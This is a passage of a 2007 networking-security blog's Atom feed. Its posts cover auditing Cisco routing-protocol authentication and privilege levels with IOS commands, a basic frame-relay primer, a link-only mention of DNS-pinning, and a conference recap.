/&gt;&lt;strong&gt;snmp-server host 192.168.1.1 cisco1 snmp&lt;br /&gt;snmp-server host 192.168.1.2 cisco2 snmp&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;So by using the access-lists, only the allowed hosts are able to perform the necessary tasks.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;RIP&lt;/strong&gt;: RIPv1 has no authentication at all, so anyone on the segment can inject routes. RIPv2 supports both plain-text and MD5 authentication. 
When auditing an IOS config file, check for the following keywords:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;key chain cisco&lt;br /&gt;key 1&lt;br /&gt;key-string rip&lt;br /&gt;&lt;br /&gt;ip rip authentication key-chain cisco&lt;br /&gt;ip rip authentication mode md5&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;To enable routing protocol authentication, the key chain command identifies a group of authentication keys, the key command identifies an authentication key on a key chain, and the key-string command specifies the authentication string for a key. On top of that, make sure that the command ip rip authentication mode md5 is enabled for RIP updates; without it, the key chain is applied but the authentication mode stays at the plain text default.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;EIGRP&lt;/strong&gt;: The same goes for EIGRP. The commands to check for EIGRP are nearly identical to RIP's, as shown below:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;key chain cisco&lt;br /&gt;key 1&lt;br /&gt;key-string eigrp&lt;br /&gt;&lt;br /&gt;ip authentication mode eigrp 10 md5&lt;br /&gt;ip authentication key-chain eigrp 10 cisco&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Please note that the command ip authentication mode eigrp 10 md5 is different from RIP's ip rip authentication mode md5. The "eigrp 10" is interpreted as eigrp &lt;autonomous system&gt;, so please take note of that.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;OSPF&lt;/strong&gt;: OSPF supports both plain text and md5 authentication. You can choose either authentication method depending on your preference. Some routers might not support md5 authentication, which leaves you with no choice but to use plain text authentication. Otherwise, deploy md5 authentication, which is 100 times more secure. 
Check for the commands below to see if the router is using any authentication.&lt;br /&gt;&lt;br /&gt;For plain text authentication:&lt;br /&gt;&lt;strong&gt;ip ospf authentication-key cisco&lt;br /&gt;area 0 authentication&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;For md5 authentication:&lt;br /&gt;&lt;strong&gt;ip ospf message-digest-key 40 md5 cisco&lt;br /&gt;area 0 authentication message-digest&lt;/strong&gt;&lt;br /&gt;Please note that the key-id (40 in this example) is what allows the key to be changed without having to disable authentication.&lt;br /&gt;&lt;br /&gt;So the above is a quick list to check for authentication on routing protocols. If you happen to have a chance to audit a router config file, just a glance will tell you how good the network administrator is.&lt;br /&gt;&lt;br /&gt;To know more about the commands' usage and meaning, refer to &lt;a href="http://cco.cisco.com/en/US/products/sw/iosswrel/ps5187/products_command_reference_chapter09186a008017d029.html"&gt;http://cco.cisco.com/en/US/products/sw/iosswrel/ps5187/products_command_reference_chapter09186a008017d029.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1076199779711475037?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1076199779711475037/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1076199779711475037' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1076199779711475037'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1076199779711475037'/><link rel='alternate' type='text/html' 
href='http://hackathology.blogspot.com/2007/04/verifying-authencation-mechanism-used.html' title='Verifying the authentication mechanism used in routing protocols'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-899189021893201058</id><published>2007-04-07T21:47:00.000+08:00</published><updated>2007-04-07T21:55:44.610+08:00</updated><title type='text'>Cisco IOS CLI regular expressions, Part II — ‘AND’</title><content type='html'>Handsomeplanet wrote about using regex in IOS, which is a good idea; see it &lt;a href="http://www.handsomeplanet.com/2007/04/07/cisco-ios-cli-regular-expressions-part-ii-and/"&gt;live&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Here’s a scenario: you’re auditing one of your routers, checking to make sure privilege levels are what they should be for individual users, and that commands that have been moved into non-default privilege levels appear to be correctly defined.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Here’s the output of ‘show running-config’ with only lines that match ‘privi’ included (so as to catch lines that show privilege levels):&lt;br /&gt;&lt;br /&gt;IOS-rtr#sh run | inc privi&lt;br /&gt;username sneezy privilege 0 secret 5 $1$Dz6cKoEINsYusITt.l&lt;br /&gt;username dopey privilege 0 secret 5 $1$MIUYWJ.I3iGq/qNleB.&lt;br /&gt;username meson privilege 0 secret 5 $1$7uBWyjan.5JB8KHR0&lt;br /&gt;username gluon privilege 15 secret 5 $1$VuoC$09dsgXRB.A/d&lt;br /&gt;privilege exec level 0 traceroute&lt;br /&gt;privilege exec level 0 ping&lt;br /&gt;privilege exec all level 0 show&lt;br /&gt;privilege exec level 0 clear ip nat translation&lt;br /&gt;privilege exec level 0 clear ip nat&lt;br /&gt;privilege exec level 0 clear ip&lt;br /&gt;privilege exec level 0 clear&lt;br /&gt;privilege configure 
level 7 logging &lt;br /&gt;privilege configure level 7 logging trap &lt;br /&gt;privilege configure level 7 logging source&lt;br /&gt;privilege level 15&lt;br /&gt;privilege level 15&lt;br /&gt;&lt;br /&gt;In this case, you can use the regular expression “.*” (dot-star) to match lines that contain both the word ‘privilege’ and ‘level 0’, thus eliminating other priv levels, as well as username definitions:&lt;br /&gt;IOS-rtr#sh run | inc privi.*level 0&lt;br /&gt;privilege exec level 0 traceroute&lt;br /&gt;privilege exec level 0 ping&lt;br /&gt;privilege exec all level 0 show&lt;br /&gt;privilege exec level 0 clear ip nat translation&lt;br /&gt;privilege exec level 0 clear ip nat&lt;br /&gt;privilege exec level 0 clear ip&lt;br /&gt;privilege exec level 0 clear&lt;br /&gt;&lt;br /&gt;The same thing works for an audit of ‘level 7’ commands:&lt;br /&gt;&lt;br /&gt;OS-rtr#sh run | inc privi.*level 7&lt;br /&gt;privilege configure level 7 logging &lt;br /&gt;privilege configure level 7 logging trap &lt;br /&gt;privilege configure level 7 logging source&lt;br /&gt;&lt;br /&gt;If you want to show lines that match privilege levels other than zero, you could use this:&lt;br /&gt;IOS-rtr#sh run | inc priv.*[1-9]&lt;br /&gt;&lt;br /&gt;You should note that the “.*” (dot-star) regular expression can be used as a synonym for AND, provided that you are aware that “.*” is not order agnostic.&lt;br /&gt;In order to do a true AND, you’d need an expression like:&lt;br /&gt;sh run | inc (privi.*level 0|level 0.*privi)&lt;br /&gt;This will match lines containing both ‘privilege’ and ‘level 0’, no matter which of the words appears first. To illustrate this, I’ll create a loopback interface (loop3) with some description text that will match the regex:&lt;br /&gt;&lt;br /&gt;IOS-rtr#conf t&lt;br /&gt;Enter configuration commands, one per line. 
End with CNTL/Z.&lt;br /&gt;IOS-rtr(config)#int loop3&lt;br /&gt;IOS-rtr(config-if)#desc level 0 is not privileged here!&lt;br /&gt;IOS-rtr(config-if)#^Z&lt;br /&gt;IOS-rtr#sh run | inc (privi.*level 0|level 0.*privi)&lt;br /&gt;description level 0 is not privileged here!&lt;br /&gt;privilege exec level 0 traceroute&lt;br /&gt;privilege exec level 0 ping&lt;br /&gt;privilege exec all level 0 show&lt;br /&gt;privilege exec level 0 clear ip nat translation&lt;br /&gt;privilege exec level 0 clear ip nat&lt;br /&gt;privilege exec level 0 clear ip&lt;br /&gt;privilege exec level 0 clear&lt;br /&gt;&lt;br /&gt;It works! Notice that we caught both the description line and the privilege exec lines.&lt;br /&gt;&lt;br /&gt;I guess I’m easily excited, but there it is. Next time I write about regular expressions for IOS, I’ll cover a kooky but somewhat useful use of ‘exclude’ that will get you just what you need from a list of dynamic switch MAC addresses.&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-899189021893201058?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/899189021893201058/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=899189021893201058' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/899189021893201058'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/899189021893201058'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/cisco-ios-cli-regular-expressions-part.html' title='Cisco IOS CLI regular expressions, Part II — 
‘AND’'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2519109215557489407</id><published>2007-04-07T21:37:00.000+08:00</published><updated>2007-04-07T21:41:18.464+08:00</updated><title type='text'>Frame-Relay explained</title><content type='html'>The other night I showed some frame-relay sample configuration and today I am going to blog more about frame-relay networks. Frame-relay is a reliable and inexpensive WAN protocol that provides QoS using the DE, FECN and BECN bits. It also saves cost for companies that used to deploy leased lines in the past, by creating Permanent Virtual Circuits (PVCs) over physical access lines. Before going further, below are some terms used in frame-relay terminology. I will not write a full article on frame-relay because the whole concept is so huge. I will just briefly describe how it works and its usage. &lt;br /&gt;&lt;br /&gt;CIR   Committed Information Rate   [Guaranteed rate at which the network commits to transfer user data under normal conditions]&lt;br /&gt;EIR   Excess Information Rate      [Maximum rate capacity on top of CIR]&lt;br /&gt;DLCI  Data Link Connection Identifier     [PVC end point connection identifier with only local significance]&lt;br /&gt;LMI   Local Management Interface   [Maintenance protocol for frame-relay]&lt;br /&gt;&lt;br /&gt;How frame-relay works is that when the router forwards data to the frame-relay switch, the switch in turn forwards the frames to the correct destination over a permanent virtual circuit. Each end of the PVC is identified by a DLCI value that has only local significance. A DLCI value is a 10-bit address in the frame-relay header which provides point-to-point or point-to-multipoint connections. 
I have drawn a simple diagram which depicts the explanation. For site A to send packets to site B, it simply specifies, in the Frame Relay header, the appropriate DLCI number for the virtual circuit that connects to Site B. However, please note that the DLCI value does not identify the whole PVC across the network; instead it is just the connection from your router to the frame-relay switch, and when the frame reaches its destination the DLCI might be a different value. That explains why it has only local significance. The CIR is the traffic rate that is guaranteed by your ISP. If packets are sent faster than the CIR rate which you had agreed with your ISP, your ISP might drop all or some of the excess packets depending on how the network is set up. The DE bit is set in the frame-relay header to mark frames that exceed the agreed rate. So if the network is not congested, the packets will flow through; otherwise the excess packets will be discarded. FECN and BECN are flags set in the frame-relay header to allow control of congested traffic. If congestion is encountered during the traffic flow, the switch sets the FECN flag on frames heading towards the receiver to indicate that packet arrival will be delayed, and sets the BECN flag on frames heading back towards the sender. In this manner, both the sending and the receiving router can expect congestion in the carrier network and delayed packet arrival. The LMI protocol is used for keepalive purposes and for global addressing, such as giving the DLCI value global significance. As you can see, I am just explaining in a very, very basic manner, because the whole technology is so huge that you could publish an entire book on it. Configuration-wise, I had already shown you guys a few examples with basic and simple frame-relay setups. You guys can read more if you are interested. Just search the wiki or cisco.com and a wealth of information is waiting for you to explore. 
However, I am still exploring more options in the configuration area. &lt;br /&gt;&lt;br /&gt;How about spoofing frame-relay frames and rerouting the whole traffic to a bogus network? Personally I have not tried it before because of cost and lack of resources. Secondly, I guess I do not touch frame-relay networks often. Well, if you guys know how to do frame-relay rerouting or spoofing, let me know.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp1.blogger.com/_Zx8XWzC_KPQ/Rhee6wmhmcI/AAAAAAAAAVY/J7QKKwlOeUQ/s1600-h/frame-relay.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_Zx8XWzC_KPQ/Rhee6wmhmcI/AAAAAAAAAVY/J7QKKwlOeUQ/s200/frame-relay.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5050680239435389378" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2519109215557489407?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2519109215557489407/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2519109215557489407' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2519109215557489407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2519109215557489407'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/frame-relay-explained.html' title='Frame-Relay explained'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_Zx8XWzC_KPQ/Rhee6wmhmcI/AAAAAAAAAVY/J7QKKwlOeUQ/s72-c/frame-relay.JPG' height='72' width='72'/><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2585343995135023028</id><published>2007-04-07T14:08:00.000+08:00</published><updated>2007-04-07T14:18:19.650+08:00</updated><title type='text'>Dns-Pinning, the next big thing?</title><content type='html'>I always admire programmers for their sharp programming skills and their structured way of logical thinking. I myself can never be good at programming or scripting. I tried many times to brush up my skills, but always failed at some point. This is the reason why I chose networking over being a developer. If I were good at programming, I would definitely develop a hell of a lot of security tools to cater to the community. Now, this leads to a very interesting article I am going to refer you guys to. Have you guys heard of DNS-Pinning? I think it's the "Next Big Thing" that is going to have an effect on the web community after XSS and CSRF. Well, it all comes down to having ideas and working on a Proof of Concept. We all know that it is possible to port-scan using JavaScript with XSS, and now comes DNS-Pinning. DNS-Pinning is like punching a hole in the firewall and allows scanning of an internal LAN. This is scary because it actually bypasses the firewall rules and returns all the open ports. I have just tested it on my machine and damn, the results are pretty accurate. 
Read on for more information.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://shampoo.antville.org/stories/1451301/"&gt;http://shampoo.antville.org/stories/1451301/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sla.ckers.org/forum/read.php?6,4511,9587#msg-9587"&gt;http://sla.ckers.org/forum/read.php?6,4511,9587#msg-9587&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2585343995135023028?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2585343995135023028/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2585343995135023028' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2585343995135023028'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2585343995135023028'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/dns-pinning-next-big-thing.html' title='Dns-Pinning, the next big thing?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4514226402962577387</id><published>2007-04-06T22:37:00.000+08:00</published><updated>2007-04-06T22:44:11.570+08:00</updated><title type='text'>HiTB Aftermath</title><content type='html'>Guys, sorry for the lack of updates, I had been really busy with the HiTB conference. Anyway, last night was the last day of the HiTB conference and, at last, I managed to get some much-needed sleep. 
The event was crazy, with lots of security gurus hanging around. Well, I did not manage to capture a lot of images, but I did manage to get the Grugq and Dino to take a picture with me. As for the conference itself, I have to say I was immensely captivated by the talk "Robbing Banks: Easier Done Than Said" by Fabrice Marie. During the talk, he explained how ATMs actually work and how easily a bank can be robbed unnoticed. Well, you guys can do a Google search and look for his past articles; they are absolutely awesome. Also, the Grugq gave us his insight into how insecure SIP is and how easy it is to penetrate networks using VoIP. Google him too and you will find articles about him. As for me, I will get back on track soon, as I have a lot to catch up on. Last but not least, I would recommend you guys visit geek00l's blog. It is open source network security at its best. This guy is seriously smart; he dissects TCP and UDP packets like no other. Read to find out: &lt;a href="http://geek00l.blogspot.com/"&gt;http://geek00l.blogspot.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/RhYIWQmhmWI/AAAAAAAAAUo/_pEnRsMMVZY/s1600-h/Image316.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/RhYIWQmhmWI/AAAAAAAAAUo/_pEnRsMMVZY/s200/Image316.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5050233210649287010" /&gt;&lt;/a&gt;&lt;br /&gt;Fabrice in action&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp1.blogger.com/_Zx8XWzC_KPQ/RhYoSAmhmXI/AAAAAAAAAUw/Zp6yU5IFgcA/s1600-h/Image315.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_Zx8XWzC_KPQ/RhYoSAmhmXI/AAAAAAAAAUw/Zp6yU5IFgcA/s200/Image315.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5050268322006931826" /&gt;&lt;/a&gt;&lt;br /&gt;Mikko H. 
Hyppönen from F-Secure in action&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/RhYpVgmhmYI/AAAAAAAAAU4/FFVydlZ71aI/s1600-h/Image317.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/RhYpVgmhmYI/AAAAAAAAAU4/FFVydlZ71aI/s200/Image317.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5050269481648101762" /&gt;&lt;/a&gt;&lt;br /&gt;Grugq and dino&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/RhY0OgmhmZI/AAAAAAAAAVA/SobrK5naRRc/s1600-h/Image319.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/RhY0OgmhmZI/AAAAAAAAAVA/SobrK5naRRc/s200/Image319.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5050281456016923026" /&gt;&lt;/a&gt;&lt;br /&gt;A shot with Dino&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/RhZTggmhmaI/AAAAAAAAAVI/O8F17znBYrs/s1600-h/Image318.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/RhZTggmhmaI/AAAAAAAAAVI/O8F17znBYrs/s200/Image318.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5050315850115029410" /&gt;&lt;/a&gt;&lt;br /&gt;A shot with The Grugq&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RhZagwmhmbI/AAAAAAAAAVQ/C2yBqBgPdCc/s1600-h/Image321.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RhZagwmhmbI/AAAAAAAAAVQ/C2yBqBgPdCc/s200/Image321.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5050323550991391154" /&gt;&lt;/a&gt;&lt;br /&gt;I got a certificate of participation from Grugq&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4514226402962577387?l=hackathology.blogspot.com' alt='' 
/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4514226402962577387/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4514226402962577387' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4514226402962577387'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4514226402962577387'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/04/hitb-aftermath.html' title='HiTB Aftermath'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Zx8XWzC_KPQ/RhYIWQmhmWI/AAAAAAAAAUo/_pEnRsMMVZY/s72-c/Image316.jpg' height='72' width='72'/><thr:total>4</thr:total></entry></feed>
